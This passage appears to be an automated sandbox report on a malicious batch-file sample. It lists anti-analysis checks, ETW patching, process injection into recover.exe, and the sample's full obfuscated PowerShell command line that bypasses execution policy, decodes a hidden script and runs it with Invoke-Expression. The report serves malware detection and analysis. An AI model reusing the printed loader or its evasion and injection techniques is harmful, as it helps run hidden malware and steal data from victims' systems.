Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,

12_2_0040BAE3

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4184	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5656	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: foregroundWindowGot 1772	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Windows\SysWOW64\recover.exe

API coverage: 9.6 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep count: 4184 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep count: 5656 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8084	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_100010F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10006580 FindFirstFileExA,	5_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 12_2_0040B477 FindFirstFileW,FindNextFileW,	12_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	13_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	16_2_00407898

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_0041A8D8 memset,GetSystemInfo,

12_2_0041A8D8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3680732491.0000000008458000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\recover.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_100060E2

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\SysWOW64\recover.exe

12_2_0040BAE3

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,

12_2_004053E1

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_10004AB4 mov eax, dword ptr fs:[00000030h]

5_2_10004AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_1000724E GetProcessHeap,

5_2_1000724E

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_100060E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_10002639
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_7976.amsi.csv, type: OTHER

.NET source code references suspicious native API functions

Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Reference to suspicious API methods: LoadLibrary("ntdll.dll")
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Reference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
Source: 5.2.powershell.exe.99a1408.7.raw.unpack, chnomklatz.cs	Reference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z310517827.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRzY3JpcHRDb250ZW50ID0gQCcNCiR1c2Vya2xyZ3JOYW1lIGtscmdyPSAkZW5rbHJncnY6VVNFa2xyZ3JSTkFNRWtscmdyOyRqbWRrbHJncm9tID0ga2xyZ3IiQzpcVWtscmdyc2Vyc1xrbHJnciR1c2Vya2xyZ3JOYW1lXGtscmdyZHdtLmJrbHJncmF0Ijtpa2xyZ3JmIChUZWtscmdyc3QtUGFrbHJncnRoICRqa2xyZ3JtZG9tKWtscmdyIHsgICBrbHJnciBXcml0a2xyZ3JlLUhvc2tscmdydCAiQmFrbHJncnRjaCBma2xyZ3JpbGUgZmtscmdyb3VuZDprbHJnciAkam1ka2xyZ3JvbSIgLWtscmdyRm9yZWdrbHJncnJvdW5ka2xyZ3JDb2xvcmtscmdyIEN5YW5rbHJncjsgICAga2xyZ3IkZmlsZWtscmdyTGluZXNrbHJnciA9IFtTa2xyZ3J5c3RlbWtscmdyLklPLkZrbHJncmlsZV06a2xyZ3I6UmVhZGtscmdyQWxsTGlrbHJncm5lcygka2xyZ3JqbWRvbWtscmdyLCBbU3lrbHJncnN0ZW0ua2xyZ3JUZXh0LmtscmdyRW5jb2RrbHJncmluZ106a2xyZ3I6VVRGOGtscmdyKTsgICBrbHJnciBmb3Jla2xyZ3JhY2ggKGtscmdyJGxpbmVrbHJnciBpbiAka2xyZ3JmaWxlTGtscmdyaW5lcylrbHJnciB7ICAga2xyZ3IgICAgIGtscmdyaWYgKCRrbHJncmxpbmUga2xyZ3ItbWF0Y2tscmdyaCAnXjprbHJncjo6ID8oa2xyZ3IuKykkJ2tscmdyKSB7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyV3JpdGVrbHJnci1Ib3N0a2xyZ3IgIkluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlIGRldGtscmdyZWN0ZWRrbHJnciBpbiB0a2xyZ3JoZSBiYWtscmdydGNoIGZrbHJncmlsZS4ia2xyZ3IgLUZvcmtscmdyZWdyb3VrbHJncm5kQ29sa2xyZ3JvciBDeWtscmdyYW47ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdydHJ5IHtrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAkZGVja2xyZ3JvZGVkQmtscmdyeXRlcyBrbHJncj0gW1N5a2xyZ3JzdGVtLmtscmdyQ29udmVrbHJncnJ0XTo6a2xyZ3JGcm9tQmtscmdyYXNlNjRrbHJnclN0cmlua2xyZ3JnKCRtYWtscmdydGNoZXNrbHJnclsxXS5Ua2xyZ3JyaW0oKWtscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgJGlrbHJncm5qZWN0a2xyZ3Jpb25Db2tscmdyZGUgPSBrbHJncltTeXN0a2xyZ3JlbS5UZWtscmdyeHQuRW5rbHJncmNvZGlua2xyZ3JnXTo6VWtscmdybmljb2RrbHJncmUuR2V0a2xyZ3JTdHJpbmtscmdyZygkZGVrbHJncmNvZGVka2xyZ3JCeXRlc2tscmdyKTsgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICAgV3JrbHJncml0ZS1Ia2xyZ3Jvc3QgImtscmdySW5qZWNrbHJncnRpb24ga2xyZ3Jjb2RlIGtscmdyZGVjb2RrbHJncmVkIHN1a2xyZ3JjY2Vzc2tscmdyZnVsbHlrbHJnci4iIC1Ga2xyZ3JvcmVncmtscmdyb3VuZENrbHJncm9sb3Iga2xyZ3JHcmVlbmtscmdyOyAgICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyICBXcmlrbHJncnRlLUhva2xyZ3JzdCAiRWtscmdyeGVjdXRrbHJncmluZyBpa2xyZ3JuamVjdGtscmdyaW9uIGNrbHJncm9kZS4ua2xyZ3IuIiAtRmtscmdyb3JlZ3JrbHJncm91bmRDa2xyZ3JvbG9yIGtscmdyWWVsbG9rbHJncnc7ICAga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgIElua2xyZ3J2b2tlLWtscmdyRXhwcmVrbHJncnNzaW9ua2xyZ3IgJGluamtscmdyZWN0aW9rbHJncm5Db2Rla2xyZ3I7ICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3IgIGJyZWtscmdyYWs7ICBrbHJnciAgICAga2xyZ3IgICAgIGtscmdyfSBjYXRrbHJncmNoIHsga2xyZ3IgICAgIGtscmdyICAgICBrbHJnciAgICAga2xyZ3JXcml0ZWtscmdyLUhvc3RrbHJnciAiRXJya2xyZ3JvciBkdWtscmdycmluZyBrbHJncmRlY29ka2xyZ3Jpbmcgb2tscmdyciBleGVrbHJncmN1dGlua2xyZ3JnIGluamtscmdyZWN0aW9rbHJncm4gY29ka2xyZ3JlOiAkX2tscmdyIiAtRm9rbHJncnJlZ3Jva2xyZ3J1bmRDb2tscmdybG9yIFJrbHJncmVkOyAga2xyZ3IgICAgIGtscmdyICAgICBrbHJncn07ICAga2xyZ3IgICAgIGtscmdyfTsgICBrbHJnciB9O30ga2xyZ3JlbHNlIGtscmdyeyAgICBrbHJnciAgV3Jpa2xyZ3J0ZS1Ib2tscmdyc3QgIlNrbHJncnlzdGVta2xyZ3IgRXJyb2tscmdycjogQm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\ymieiytvun"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\bgnxiqeoiwifqy"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\recover.exe C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\lishjapiweakaeklt"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

